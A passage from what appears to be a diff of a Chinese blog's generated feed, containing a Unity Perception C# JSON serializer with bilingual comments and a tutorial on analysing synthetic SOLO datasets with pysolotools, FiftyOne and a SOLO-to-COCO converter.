    // 允许注解定义将自身转换为消息并将其添加到我们的构建器中
    annotationDefinition.ToMessage(builder);

    // Invariant: The builder now contains a representation of the annotation definition class
    // 不变量:该构建器现在包含注解定义类的表示
    // 3. We can use the ToJson function in the builder to write that representation to JSON
    // 我们可以使用构建器中的 ToJson 函数将该表示写入 JSON
    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, $"annotation-definition-{annotationDefinition.id}.json"),
    builder.ToJson()
    );
    }

    public void MetricRegistered(MetricDefinition metricDefinition)
    {
    // Using Method 2 (IMessageProducer Serialization)
    // 使用方法 2(IMessageProducer 序列化)

    // Similar to SensorDefinition, MetricDefinition also inherits from IMessageProducer so it can tell the builder how it should be serialized.
    // 类似于 SensorDefinition,MetricDefinition 也继承自 IMessageProducer,因此它可以告诉构建器它应该如何序列化。
    var builder = GetNewJsonMessageBuilder();
    metricDefinition.ToMessage(builder);
    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, $"annotation-definition-{metricDefinition.id}.json"),
    builder.ToJson()
    );
    }

    public void FrameGenerated(Frame frame)
    {
    // Using Method 2 (IMessageProducer Serialization)

    // By default, the JsonMessageBuilder class does not know how to process image files referenced in the
    // Frame class. So we need to make a new FlatFrameMessageBuilder that inherits from JsonMessageBuilder
    // and specify how to handle image files. We can conveniently use the ToMessage function of the Frame
    // class and pass in our new FlatFrameMessageBuilder class.
    // 默认情况下,JsonMessageBuilder 类不知道如何处理 Frame 类中引用的图像文件。
    // 因此,我们需要创建一个新的 FlatFrameMessageBuilder 类,它继承自 JsonMessageBuilder 并指定如何处理图像文件。
    // 我们可以方便地使用 Frame 类的 ToMessage 函数并传入我们的新的 FlatFrameMessageBuilder 类。
    var builder = new FlatFrameMessageBuilder(this, frame);
    frame.ToMessage(builder);

    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, $"frame-{frame.id}.json"),
    builder.ToJson()
    );
    }

    public void SimulationCompleted(SimulationMetadata metadata)
    {
    // Using Method 2 (IMessageProducer Serialization)
    // 使用方法 2(IMessageProducer 序列化)

    // 1. Create a new JsonMessageBuilder class
    // 创建一个新的 JsonMessageBuilder 类
    var metadataBuilder = GetNewJsonMessageBuilder();

    // 2. Add metadata as a message into the metadataBuilder
    // 将元数据作为消息添加到 metadataBuilder 中
    metadata.ToMessage(metadataBuilder);

    // 3. Write the metadata parameter to {currentPath}/metadata.json
    // 将元数据参数写入 {currentPath}/metadata.json
    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, "metadata.json"),
    metadataBuilder.ToJson()
    );

    //// Using Method 1 (Custom Serialization)

    // 1. Create a new JsonMessageBuilder class
    var completeBuilder = GetNewJsonMessageBuilder();
    var simulationEndTime = DateTimeOffset.Now;
    var simulationDuration = simulationEndTime - m_SimulationStartTime;

    // 2. Add all relevant key-value pairs
    completeBuilder.AddLong("start_timestamp", m_SimulationStartTime.ToUnixTimeMilliseconds());
    completeBuilder.AddLong("end_timestamp", m_SimulationStartTime.ToUnixTimeMilliseconds());
    completeBuilder.AddDouble("duration_seconds", simulationDuration.TotalSeconds);

    // 3. Convert data to json and write to file
    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, "simulation-complete.json"),
    completeBuilder.ToJson()
    );
    }

    /// <summary>
    /// Placeholder for crash resumption logic.
    /// 崩溃续传逻辑占位符
    /// </summary>
    /// <remarks>Unsupported for FlatEndpoint</remarks>
    /// FlatEndpoint 不支持该操作。
    public (string, int) ResumeSimulationFromCrash(int maxFrameCount)
    {
    Debug.LogError("Crash resumption not supported for FlatEndpoint output.");
    return (string.Empty, 0);
    }

    public object Clone()
    {
    return new FlatEndpoint();
    }

    #endregion
    }

    /// <summary>
    /// A MessageBuilder that extends JsonMessageBuilder to add support for serializing images and tensors.
    /// 创建一个新的 MessageBuilder 类,它继承自 JsonMessageBuilder 并添加支持序列化图像和张量的功能。
    /// </summary>
    class FlatFrameMessageBuilder : JsonMessageBuilder
    {
    Frame m_Frame;
    FlatEndpoint m_Endpoint;

    public FlatFrameMessageBuilder(FlatEndpoint endpoint, Frame frame)
    {
    m_Endpoint = endpoint;
    m_Frame = frame;
    }

    /// <summary>
    /// Write out the byte array as an image and append sequence and step number to the key to construct the final file-name.
    /// 将字节数组写出为图像,并将序列号和步骤号附加到键上构造最终的文件名。
    /// </summary>
    public override void AddEncodedImage(string key, string extension, byte[] value)
    {
    if (value.Length > 0)
    {
    var filename = $"{key}_{m_Frame.sequence}-{m_Frame.step}.{extension.ToLower()}";
    // write out the file
    PathUtils.WriteAndReportImageFile(
    Path.Combine(m_Endpoint.currentPath, filename),
    value
    );
    }
    }

    /// <summary>
    /// A nested message adds the output of an IMessageBuilder to a specific key.
    /// 嵌套消息将 IMessageBuilder 的输出添加到特定的键中。
    /// </summary>
    public override IMessageBuilder AddNestedMessage(string key)
    {
    var nested = new FlatFrameMessageBuilder(m_Endpoint, m_Frame);
    if (nestedValue.ContainsKey(key))
    {
    Debug.LogWarning($"Report data with key [{key}] will be overridden by new values");
    }

    nestedValue[key] = nested;
    return nested;
    }

    /// <summary>
    /// 将 IMessageBuilder 的输出作为键为 <see cref="arraykey"/> 的数组元素添加。
    /// Adds the output of an IMessageBuilder as an element of an array identified by the key <see cref="arraykey"/>.
    /// </summary>
    public override IMessageBuilder AddNestedMessageToVector(string arraykey)
    {
    if (!nestedArrays.TryGetValue(arraykey, out var nestedList))
    {
    nestedList = new List<JsonMessageBuilder>();
    nestedArrays[arraykey] = nestedList;
    }
    var nested = new FlatFrameMessageBuilder(m_Endpoint, m_Frame);
    nestedList.Add(nested);
    return nested;
    }

    // A tensor is a multi-dimensional array
    public override void AddTensor(string key, Tensor tensor)
    {
    // By default, write the tensor as a flattened array
    // 默认情况下,将张量写为一个扁平化的数组。
    currentJToken[key] = new JArray(tensor.buffer);
    }
    }
    }

    Metadata Labeler

    ]]>
    @@ -6487,7 +6487,7 @@ /posts/Python-%E5%A4%84%E7%90%86%20SOLO%20%E6%95%B0%E6%8D%AE%E9%9B%86/ - 正文

    Pysolotools Overview

    安装环境:

    conda create -n pysolotools_env python=3.8
    conda activate pysolotools_env
    pip install pysolotools -i https://pypi.tuna.tsinghua.edu.cn/simple
    pip install jupyter

    Unity-Technologies/pysolotools: Python toolchain for SOLO. (github.com) 下载仓库,cmd 中转到该目录下,打开 Jupyter Notebook

    jupyter notebook

    打开 examples/SOLO_Statistics.ipynb

    png

    data_dir_path 里的值设置为所合成数据集的路径,开跑!


    import matplotlib.patches as mpatches
    import matplotlib.pyplot as plt
    import numpy as np
    import pandas as pd
    import seaborn as sns
    from pysolotools.consumers.solo import Solo
    from pysolotools.stats.analyzers.image_analysis_analyzer import (
    LaplacianStatsAnalyzer,
    PowerSpectrumStatsAnalyzer,
    WaveletTransformStatsAnalyzer,
    )
    from pysolotools.stats.analyzers.bbox_analyzer import (
    BBoxHeatMapStatsAnalyzer,
    BBoxSizeStatsAnalyzer,
    BBoxCountStatsAnalyzer
    )
    from pysolotools.stats.handler import StatsHandler

    Initialize SOLO object

    data_dir_path = r"XXXX"
    solo = Solo(data_dir_path)

    Object Detection Stats

    • BBoxCountStatsAnalyzer 类用于分析检测结果中 bounding box(边界框)的数量。这个类接受一个 Solo 对象作为参数,该对象包含了所有的检测结果,即一系列目标检测的 bounding box 区域。通过 bbox_count_analyzer 对象,可以获得检测结果中 bounding box 的数量统计信息,例如最小值、最大值、平均值和方差等。
    • BBoxSizeStatsAnalyzer 类用于分析检测结果中 bounding box 的大小分布情况。它没有接受参数,可以用于任何包含 bounding box 信息的数据集。通过 bbox_size_analyzer 对象,可以获得检测结果中 bounding box 大小的统计信息,例如最小值、最大值、平均值和方差等。
    • BBoxHeatMapStatsAnalyzer 类用于生成针对检测结果中 bounding box 的热图。它也没有接受参数,可以用于任何包含 bounding box 信息的数据集。通过 bbox_hmap_analyzer 对象,可以将检测结果中 bounding box 的位置信息映射到一张图片上,并且可视化出 bounding box 的密度分布情况。
    bbox_count_analyzer = BBoxCountStatsAnalyzer(solo)
    bbox_size_analyzer = BBoxSizeStatsAnalyzer()
    bbox_hmap_analyzer = BBoxHeatMapStatsAnalyzer()
    • StatsHandler 类可以接受一个包含统计信息的 Solo 对象作为参数,并提供了 handle 方法用于处理分析器(Analyzer)列表。在本例中,StatsHandler 对象的参数是 solo,即目标检测结果数据集。另外,handle 方法接受一个 Analyzer 对象列表作为参数,分别是 bbox_count_analyzer、bbox_hmap_analyzer 和 bbox_size_analyzer。
    • handle 方法返回一个结果对象,其中包含了以一定形式储存的三种分析器的统计信息数据。例如,bbox_count_analyzer 可以输出 bounding box 数量的最大值、最小值和平均值,bbox_hmap_analyzer 可以输出 bounding box 密度热力图数据,bbox_size_analyzer 可以输出 bounding box 大小的统计信息。result 就是这些统计信息的集合。
    # 这段代码使用 StatsHandler 对象对前文定义的三个分析工具进行处理,并返回处理结果。
    stats_handler = StatsHandler(solo)
    result = stats_handler.handle([bbox_count_analyzer, bbox_hmap_analyzer, bbox_size_analyzer])

    SOLO Metadata

    print(f'Total Sequences: {solo.metadata.totalSequences}')
    print(f'Total Frames: {solo.metadata.totalFrames}')
    print(f'Frames Per Sequence: {solo.metadata.totalFrames / solo.metadata.totalSequences}')
    Total Sequences: 100Total Frames: 100Frames Per Sequence: 1.0

    Categories in Dataset

    categories = solo.categories()
    categories_df = pd.DataFrame.from_dict(categories, orient="index")
    categories_df.columns = ['Label']
    categories_df
    Label
    1 drink_whippingcream_lucerne
    2 lotion_essentially_nivea
    3 craft_yarn_caron_01
    4 cereal_cheerios_honeynut
    5 candy_minipralines_lindt
    6 pasta_lasagne_barilla
    7 drink_greentea_itoen
    8 snack_granolabar_naturevalley
    9 snack_biscotti_ghiott_01
    10 cleaning_snuggle_henkel
    #### Objects in Dataset

    这段代码使用了前面统计分析工具的结果对象 bbox_counts,并基于此对数据集中 bounding box 的数量分布进行可视化:

    # 用于获取统计分析工具 BBoxCountStatsAnalyzer 的结果对象 bbox_counts
    bbox_counts = result["BBoxCountStatsAnalyzer"]
    # 获取数据集中 bounding box 的总数
    print(f'Total count of objects in dataset: {bbox_counts.get_total_count()}')

    # 指定 frame_list 为展示帧列表来获得每一帧中 bounding box 的数量分布情况
    # 由于针对所有视频帧进行可视化过于繁琐,因此在这里仅展示了2-20帧的数据
    end = min(20, solo.metadata.totalFrames)
    frame_list = list(range(2, end))

    frame_counts = bbox_counts.get_count_per_frame(frame_list)

    x, y = frame_counts.keys(), frame_counts.values()
    fig, ax = plt.subplots(1, 1)
    ax.bar(x, y, width=1)
    ax.set_xlim(2, end)
    plt.xticks(frame_list)
    print("\nObjects Per Frame:")
    plt.show()

    Total count of objects in dataset: 625Objects Per Frame:

    png

    下一张图显示了每个帧中有多少特定对象,在这种情况下,我们正在寻找“cereal_cheerios_honeynut”标签类别。

    这里应该在生成数据集的时候哪里出错了,emmm啥也没有。

    k = list(categories.keys())
    frame_counts = bbox_counts.get_count_per_frame(frame_list, [k[0]])
    x, y = frame_counts.keys(), frame_counts.values()
    fig, ax = plt.subplots(1, 1)
    ax.bar(x, y, width=1)
    ax.set_xlim(2, end)
    plt.xticks(frame_list)
    print(f"\n{categories[k[0]]} Per Frame:")
    plt.show()
    cereal_cheerios_honeynut Per Frame:

    png

    BBox Heatmap

    这段代码使用了前面统计分析工具的结果对象 bbox_heatmap,并基于此对 bounding box 的热图进行可视化。其中,bbox_heatmap_norm 用于将原始数据映射到 0-1 范围内,便于可视化。

    # 获取统计分析工具 BBoxHeatMapStatsAnalyzer 的结果对象 bbox_heatmap
    bbox_heatmap = result["BBoxHeatMapStatsAnalyzer"]
    # 将原始数据归一化到 0-1 范围内
    bbox_heatmap_norm = bbox_heatmap / bbox_heatmap.max()
    # 使用 Matplotlib 库的 imshow() 函数将 bbox_heatmap 可视化为热图
    # 其中 cmap 参数用于指定热图的颜色映射方案,这里使用了 "plasma" 方案
    fig, ax = plt.subplots(dpi=100, figsize=(8,8))
    pcm = ax.imshow(bbox_heatmap_norm[:,:,0], cmap="plasma", )
    plt.show()

    这段代码使用了 bbox_heatmap 对象中的数据统计结果,以可视化的方式展示了 bounding box 密度分布情况。这个可视化手段可以帮助用户更好地了解数据集中目标检测结果的分布密度情况。

    png

    Bounding Box Size Distribution

    # 用于获取统计分析工具 BBoxSizeStatsAnalyzer 的结果对象 bbox_size_dist
    bbox_size_dist = result["BBoxSizeStatsAnalyzer"]
    # 用于构造一个二维列表 bbox_size
    # 其中每个元素表示一个 bounding box 的大小(即长度或宽度),类型为 "Synth",权重为该大小所占比例
    bbox_size = [[x, "Synth", 1/len(bbox_size_dist)] for x in bbox_size_dist]
    # 使用 pandas 库的 DataFrame() 函数将 bbox_size 转换为 DataFrame 类型数据,并指定好列名
    df = pd.DataFrame(bbox_size, columns =['val', 'type', 'w'])

    # 使用 seaborn 库的 histplot() 函数绘制直方图
    fig, ax = plt.subplots(dpi=80, figsize=(10,6))
    sns.histplot(data=df, x="val", hue="type", weights='w',
    bins=50, multiple="layer", alpha=.85, ax=ax, legend=None)

    # where some data has already been plotted to ax
    handles, labels = ax.get_legend_handles_labels()

    # manually define a new patch
    colors = plt.rcParams['axes.prop_cycle'].by_key()['color']
    patch1 = mpatches.Patch(color=colors[0], label='Synth')
    handles.append(patch1)

    plt.legend(handles=handles, fontsize=18)

    # 手动定义一个新的图例来替换原有的图例
    ax.set_xlabel("Bouding Box's relative size in an image", fontsize=18)
    ax.set_ylabel("Bouding Box Probability", fontsize=18)
    ax.yaxis.set_tick_params(labelsize=18)
    ax.xaxis.set_tick_params(labelsize=18)

    fig.tight_layout()

    plt.show()

    png

    Initialize Analyzers and Handler

    这段代码使用了三个不同的图像分析工具,分别对一个图像进行处理,并将它们的结果传递给 StatsHandler 处理器进行统一处理。这个手段可以帮助用户更全面地了解图像的本质特征

    # 对图像 solo 进行拉普拉斯算子处理,获取其图像增强的结果,并保存到 laplacian_analyzer 对象中
    laplacian_analyzer = LaplacianStatsAnalyzer(solo)
    # 对图像 solo 进行功率谱密度分析,获取其频谱信息,并保存到 psd_analyzer 对象中
    psd_analyzer = PowerSpectrumStatsAnalyzer(solo)
    # 对图像 solo 进行小波变换处理,获取其变换后的系数信息,并保存到 wavelet_analyzer 对象中
    wavelet_analyzer = WaveletTransformStatsAnalyzer(solo)

    stats_handler = StatsHandler(solo)
    result = stats_handler.handle([laplacian_analyzer, psd_analyzer, wavelet_analyzer])

    Image Analysis Stats

    bbox_var = result["LaplacianStatsAnalyzer"]["bbox_var"]
    img_var = result["LaplacianStatsAnalyzer"]["img_var"]

    Laplacian

    # 使用 plt.subplots() 函数创建一个包含单个子图的图形窗口 fig 和 axes 坐标系对象 ax
    fig, ax = plt.subplots(dpi=80, figsize=(10,6))

    # 使用 ax.boxplot() 函数绘制一个箱线图。
    # 其中,bbox_var 表示绘制的数据,
    # vert=0 表示水平展示,
    # patch_artist=True 表示填充箱体颜色,
    # labels=["Synth"] 表示 x 轴标签,
    # showmeans=True 表示显示均值,
    # meanline=True 表示画均值连线,
    # showfliers=False 表示不显示异常值
    box = ax.boxplot(bbox_var,vert=0,patch_artist=True,labels=["Synth"],
    showmeans=True, meanline=True, showfliers=False,)

    # 使用 plt.rcParams['axes.prop_cycle'].by_key()['color'] 获取默认调色板的颜色列表 colors,并为第一个箱体设置填充色和透明度
    colors = plt.rcParams['axes.prop_cycle'].by_key()['color']
    box['boxes'][0].set_facecolor(colors[1])
    box['boxes'][0].set_alpha(0.50)

    # 手动修改均值点、中位数点和坐标轴标签文本等样式。使用 box['medians'][0].set_color()、box['means'][0].set_color() 等方法设置样式
    box['medians'][0].set_color('black')
    box['means'][0].set_color('black')
    x, y = box['means'][0].get_xydata()[1]
    mean = np.array(bbox_var).mean()
    text = ' μ={:.2f}'.format(mean)
    ax.annotate(text, xy=(x, y+0.05), fontsize=15)

    plt.plot([], [], '--', linewidth=1, color='black', label='Mean')
    plt.plot([], [], '-', linewidth=1, color='black', label='Median')

    # 使用 plt.legend() 函数添加图例,并设置坐标轴刻度、标签和标题等属性
    plt.legend(fontsize=15, loc="upper left")

    plt.xticks(fontsize=15 )
    plt.yticks(fontsize=15 )
    plt.xscale('log')
    plt.xlabel(f"Var of Laplacian of Background in log scale", fontsize=18)
    plt.ylabel("Dataset", fontsize=15)

    plt.show()

    png

    Wavelet

    这段代码用于对一个图像进行小波变换并对其水平和垂直方向的 cH 系数进行直方图分析,然后将两个方向的直方图绘制在同一个图表中。

    hist_list = []
    for coeff_type in ["horizontal", "vertical", "diagonal"]:
    coeff = result["WaveletTransformStatsAnalyzer"][coeff_type]
    hist = plt.hist(coeff, bins=np.logspace(np.log10(max([min(coeff), np.finfo(float).eps])), np.log10(max(coeff))))
    hist_list.append(hist)
    plt.close()

    fig, ax = plt.subplots(dpi=80, figsize=(10,6))
    colors = iter(plt.rcParams['axes.prop_cycle'].by_key()['color'])
    for hist, hist_type in zip(hist_list, ["horizontal", "vertical",]):
    norm_data = (hist[0] - min(hist[0]))/(max(hist[0])-min(hist[0]))
    ax.plot(hist[1][1:],norm_data, linestyle='-', label=hist_type, linewidth=3, color=next(colors))

    ax.set_xscale('log')

    plt.legend(loc="upper right", fontsize=15)
    plt.xlabel("Var of cH in Log Scale", fontsize=18)
    plt.ylabel("Density", fontsize=18)
    plt.xticks(fontsize=18)
    plt.yticks(fontsize=18)

    plt.setp(ax.spines.values(), linewidth=2.5)

    plt.show()

    png

    Power Spectrum

    这段代码用于计算一个图像的一维功率谱密度,使用可视化方式展示其频域特征。用户可以通过观察功率谱密度曲线来了解图像中不同频率成分所占比例的大小关系,以及在不同频率范围内的能量分布情况。

    psd_1d = np.nanmean(result["PowerSpectrumStatsAnalyzer"], axis=0)

    fig, ax = plt.subplots(dpi=100)
    colors = (plt.rcParams['axes.prop_cycle'].by_key()['color'])
    ax.plot(psd_1d, color=colors[1], label="PSD")

    plt.legend(fontsize=12)
    ax.set_xscale('log')
    ax.set_yscale('log')
    plt.ylabel("P(k)", fontsize=15)
    plt.xlabel("k", fontsize=15)
    plt.title("1D PSD")
    plt.xlim([1, None])
    plt.show()

    png

    Visualizing SOLO Datasets with Voxel51 and Pysolotools

    安装 OpenEXR(巨难装)、pysolotools-fiftyone:

    conda activate pysolotools_env
    conda install -c conda-forge openexr-python
    pip install openexr
    pip install pysolotools-fiftyone

    开跑!

    将生成的数据集放在一个文件夹中,不能有空格:D:\Study\1st-year-master\Datasets\solo_11

    终端输入:

    pysolotools-fiftyone D:\Study\1st-year-master\Datasets\solo_11

    jpg

    Using Pysolotools to Convert From SOLO to COCO

    本指南将引导您完成将数据集从 SOLO 格式转换为 COCO 格式的整个过程。我们将使用 Unity 的计算机视觉团队的 pysolotools 来完成这项任务。Pysolotools 是一个 Python 包,它提供了各种工具来处理、分析和转换使用 Perception 包生成的 SOLO 数据集。

    solo2coco <SOLO_PATH> <COCO_PATH>

    这玩意好像很吃性能,把该关的都关了,不然很容易挂。之后就能得到 COCO 格式的数据集:

    jpg

    ]]>
    + 正文

    Pysolotools Overview

    安装环境:

    1
    2
    3
    4
    conda create -n pysolotools_env python=3.8
    conda activate pysolotools_env
    pip install pysolotools -i https://pypi.tuna.tsinghua.edu.cn/simple
    pip install jupyter

    Unity-Technologies/pysolotools: Python toolchain for SOLO. (github.com) 下载仓库,cmd 中转到该目录下,打开 Jupyter Notebook

    1
    jupyter notebook

    打开 examples/SOLO_Statistics.ipynb

    png

    data_dir_path 里的值设置为所合成数据集的路径,开跑!


    1
    2
    3
    4
    5
    import matplotlib.patches as mpatches
    import matplotlib.pyplot as plt
    import numpy as np
    import pandas as pd
    import seaborn as sns
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    from pysolotools.consumers.solo import Solo
    from pysolotools.stats.analyzers.image_analysis_analyzer import (
    LaplacianStatsAnalyzer,
    PowerSpectrumStatsAnalyzer,
    WaveletTransformStatsAnalyzer,
    )
    from pysolotools.stats.analyzers.bbox_analyzer import (
    BBoxHeatMapStatsAnalyzer,
    BBoxSizeStatsAnalyzer,
    BBoxCountStatsAnalyzer
    )
    from pysolotools.stats.handler import StatsHandler

    Initialize SOLO object

    1
    2
    data_dir_path = r"XXXX"
    solo = Solo(data_dir_path)

    Object Detection Stats

    • BBoxCountStatsAnalyzer 类用于分析检测结果中 bounding box(边界框)的数量。这个类接受一个 Solo 对象作为参数,该对象包含了所有的检测结果,即一系列目标检测的 bounding box 区域。通过 bbox_count_analyzer 对象,可以获得检测结果中 bounding box 的数量统计信息,例如最小值、最大值、平均值和方差等。
    • BBoxSizeStatsAnalyzer 类用于分析检测结果中 bounding box 的大小分布情况。它没有接受参数,可以用于任何包含 bounding box 信息的数据集。通过 bbox_size_analyzer 对象,可以获得检测结果中 bounding box 大小的统计信息,例如最小值、最大值、平均值和方差等。
    • BBoxHeatMapStatsAnalyzer 类用于生成针对检测结果中 bounding box 的热图。它也没有接受参数,可以用于任何包含 bounding box 信息的数据集。通过 bbox_hmap_analyzer 对象,可以将检测结果中 bounding box 的位置信息映射到一张图片上,并且可视化出 bounding box 的密度分布情况。
    1
    2
    3
    bbox_count_analyzer = BBoxCountStatsAnalyzer(solo)
    bbox_size_analyzer = BBoxSizeStatsAnalyzer()
    bbox_hmap_analyzer = BBoxHeatMapStatsAnalyzer()
    • StatsHandler 类可以接受一个包含统计信息的 Solo 对象作为参数,并提供了 handle 方法用于处理分析器(Analyzer)列表。在本例中,StatsHandler 对象的参数是 solo,即目标检测结果数据集。另外,handle 方法接受一个 Analyzer 对象列表作为参数,分别是 bbox_count_analyzer、bbox_hmap_analyzer 和 bbox_size_analyzer。
    • handle 方法返回一个结果对象,其中包含了以一定形式储存的三种分析器的统计信息数据。例如,bbox_count_analyzer 可以输出 bounding box 数量的最大值、最小值和平均值,bbox_hmap_analyzer 可以输出 bounding box 密度热力图数据,bbox_size_analyzer 可以输出 bounding box 大小的统计信息。result 就是这些统计信息的集合。
    1
    2
    3
    # 这段代码使用 StatsHandler 对象对前文定义的三个分析工具进行处理,并返回处理结果。
    stats_handler = StatsHandler(solo)
    result = stats_handler.handle([bbox_count_analyzer, bbox_hmap_analyzer, bbox_size_analyzer])

    SOLO Metadata

    1
    2
    3
    print(f'Total Sequences: {solo.metadata.totalSequences}')
    print(f'Total Frames: {solo.metadata.totalFrames}')
    print(f'Frames Per Sequence: {solo.metadata.totalFrames / solo.metadata.totalSequences}')
    Total Sequences: 100Total Frames: 100Frames Per Sequence: 1.0

    Categories in Dataset

    1
    2
    3
    4
    categories = solo.categories()
    categories_df = pd.DataFrame.from_dict(categories, orient="index")
    categories_df.columns = ['Label']
    categories_df
    Label
    1 drink_whippingcream_lucerne
    2 lotion_essentially_nivea
    3 craft_yarn_caron_01
    4 cereal_cheerios_honeynut
    5 candy_minipralines_lindt
    6 pasta_lasagne_barilla
    7 drink_greentea_itoen
    8 snack_granolabar_naturevalley
    9 snack_biscotti_ghiott_01
    10 cleaning_snuggle_henkel
    1
    #### Objects in Dataset

    这段代码使用了前面统计分析工具的结果对象 bbox_counts,并基于此对数据集中 bounding box 的数量分布进行可视化:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    # 用于获取统计分析工具 BBoxCountStatsAnalyzer 的结果对象 bbox_counts
    bbox_counts = result["BBoxCountStatsAnalyzer"]
    # 获取数据集中 bounding box 的总数
    print(f'Total count of objects in dataset: {bbox_counts.get_total_count()}')

    # 指定 frame_list 为展示帧列表来获得每一帧中 bounding box 的数量分布情况
    # 由于针对所有视频帧进行可视化过于繁琐,因此在这里仅展示了2-20帧的数据
    end = min(20, solo.metadata.totalFrames)
    frame_list = list(range(2, end))

    frame_counts = bbox_counts.get_count_per_frame(frame_list)

    x, y = frame_counts.keys(), frame_counts.values()
    fig, ax = plt.subplots(1, 1)
    ax.bar(x, y, width=1)
    ax.set_xlim(2, end)
    plt.xticks(frame_list)
    print("\nObjects Per Frame:")
    plt.show()

    Total count of objects in dataset: 625Objects Per Frame:

    png

    下一张图显示了每个帧中有多少特定对象,在这种情况下,我们正在寻找“cereal_cheerios_honeynut”标签类别。

    这里应该在生成数据集的时候哪里出错了,emmm啥也没有。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    k = list(categories.keys())
    frame_counts = bbox_counts.get_count_per_frame(frame_list, [k[0]])
    x, y = frame_counts.keys(), frame_counts.values()
    fig, ax = plt.subplots(1, 1)
    ax.bar(x, y, width=1)
    ax.set_xlim(2, end)
    plt.xticks(frame_list)
    print(f"\n{categories[k[0]]} Per Frame:")
    plt.show()
    cereal_cheerios_honeynut Per Frame:

    png

    BBox Heatmap

    这段代码使用了前面统计分析工具的结果对象 bbox_heatmap,并基于此对 bounding box 的热图进行可视化。其中,bbox_heatmap_norm 用于将原始数据映射到 0-1 范围内,便于可视化。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    # 获取统计分析工具 BBoxHeatMapStatsAnalyzer 的结果对象 bbox_heatmap
    bbox_heatmap = result["BBoxHeatMapStatsAnalyzer"]
    # 将原始数据归一化到 0-1 范围内
    bbox_heatmap_norm = bbox_heatmap / bbox_heatmap.max()
    # 使用 Matplotlib 库的 imshow() 函数将 bbox_heatmap 可视化为热图
    # 其中 cmap 参数用于指定热图的颜色映射方案,这里使用了 "plasma" 方案
    fig, ax = plt.subplots(dpi=100, figsize=(8,8))
    pcm = ax.imshow(bbox_heatmap_norm[:,:,0], cmap="plasma", )
    plt.show()

    这段代码使用了 bbox_heatmap 对象中的数据统计结果,以可视化的方式展示了 bounding box 密度分布情况。这个可视化手段可以帮助用户更好地了解数据集中目标检测结果的分布密度情况。

    png

    Bounding Box Size Distribution

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    # 用于获取统计分析工具 BBoxSizeStatsAnalyzer 的结果对象 bbox_size_dist
    bbox_size_dist = result["BBoxSizeStatsAnalyzer"]
    # 用于构造一个二维列表 bbox_size
    # 其中每个元素表示一个 bounding box 的大小(即长度或宽度),类型为 "Synth",权重为该大小所占比例
    bbox_size = [[x, "Synth", 1/len(bbox_size_dist)] for x in bbox_size_dist]
    # 使用 pandas 库的 DataFrame() 函数将 bbox_size 转换为 DataFrame 类型数据,并指定好列名
    df = pd.DataFrame(bbox_size, columns =['val', 'type', 'w'])

    # 使用 seaborn 库的 histplot() 函数绘制直方图
    fig, ax = plt.subplots(dpi=80, figsize=(10,6))
    sns.histplot(data=df, x="val", hue="type", weights='w',
    bins=50, multiple="layer", alpha=.85, ax=ax, legend=None)

    # where some data has already been plotted to ax
    handles, labels = ax.get_legend_handles_labels()

    # manually define a new patch
    colors = plt.rcParams['axes.prop_cycle'].by_key()['color']
    patch1 = mpatches.Patch(color=colors[0], label='Synth')
    handles.append(patch1)

    plt.legend(handles=handles, fontsize=18)

    # 手动定义一个新的图例来替换原有的图例
    ax.set_xlabel("Bouding Box's relative size in an image", fontsize=18)
    ax.set_ylabel("Bouding Box Probability", fontsize=18)
    ax.yaxis.set_tick_params(labelsize=18)
    ax.xaxis.set_tick_params(labelsize=18)

    fig.tight_layout()

    plt.show()

    png

    Initialize Analyzers and Handler

    这段代码使用了三个不同的图像分析工具,分别对一个图像进行处理,并将它们的结果传递给 StatsHandler 处理器进行统一处理。这个手段可以帮助用户更全面地了解图像的本质特征

    1
    2
    3
    4
    5
    6
    7
    8
    9
    # 对图像 solo 进行拉普拉斯算子处理,获取其图像增强的结果,并保存到 laplacian_analyzer 对象中
    laplacian_analyzer = LaplacianStatsAnalyzer(solo)
    # 对图像 solo 进行功率谱密度分析,获取其频谱信息,并保存到 psd_analyzer 对象中
    psd_analyzer = PowerSpectrumStatsAnalyzer(solo)
    # 对图像 solo 进行小波变换处理,获取其变换后的系数信息,并保存到 wavelet_analyzer 对象中
    wavelet_analyzer = WaveletTransformStatsAnalyzer(solo)

    stats_handler = StatsHandler(solo)
    result = stats_handler.handle([laplacian_analyzer, psd_analyzer, wavelet_analyzer])

    Image Analysis Stats

    1
    2
    bbox_var = result["LaplacianStatsAnalyzer"]["bbox_var"]
    img_var = result["LaplacianStatsAnalyzer"]["img_var"]

    Laplacian

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    # 使用 plt.subplots() 函数创建一个包含单个子图的图形窗口 fig 和 axes 坐标系对象 ax
    fig, ax = plt.subplots(dpi=80, figsize=(10,6))

    # 使用 ax.boxplot() 函数绘制一个箱线图。
    # 其中,bbox_var 表示绘制的数据,
    # vert=0 表示水平展示,
    # patch_artist=True 表示填充箱体颜色,
    # labels=["Synth"] 表示 x 轴标签,
    # showmeans=True 表示显示均值,
    # meanline=True 表示画均值连线,
    # showfliers=False 表示不显示异常值
    box = ax.boxplot(bbox_var,vert=0,patch_artist=True,labels=["Synth"],
    showmeans=True, meanline=True, showfliers=False,)

    # 使用 plt.rcParams['axes.prop_cycle'].by_key()['color'] 获取默认调色板的颜色列表 colors,并为第一个箱体设置填充色和透明度
    colors = plt.rcParams['axes.prop_cycle'].by_key()['color']
    box['boxes'][0].set_facecolor(colors[1])
    box['boxes'][0].set_alpha(0.50)

    # 手动修改均值点、中位数点和坐标轴标签文本等样式。使用 box['medians'][0].set_color()、box['means'][0].set_color() 等方法设置样式
    box['medians'][0].set_color('black')
    box['means'][0].set_color('black')
    x, y = box['means'][0].get_xydata()[1]
    mean = np.array(bbox_var).mean()
    text = ' μ={:.2f}'.format(mean)
